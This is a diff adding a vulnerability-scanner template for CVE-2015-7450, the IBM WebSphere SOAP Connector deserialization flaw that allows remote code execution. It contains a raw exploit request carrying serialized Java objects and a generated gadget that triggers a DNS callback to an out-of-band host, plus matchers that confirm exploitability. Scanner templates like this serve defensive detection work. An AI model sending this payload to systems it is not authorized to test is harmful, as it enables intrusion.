diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml new file mode 100644 index 0000000000..a28bfc6ead --- /dev/null +++ b/cves/2015/CVE-2015-7450.yaml @@ -0,0 +1,51 @@ +id: CVE-2015-7450 + +info: + name: IBM WebSphere Java Object Deserialization RCE + author: wdahlenb + severity: critical + description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) + reference: + - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 + tags: cve,cve2015,websphere,deserialization,rce + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: "urn:AdminService" + + + + + + + + rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== + getUnsavedChanges + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} + rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= + + + + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + words: + - 'SOAP-ENV:Server' + - '' + condition: and + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns"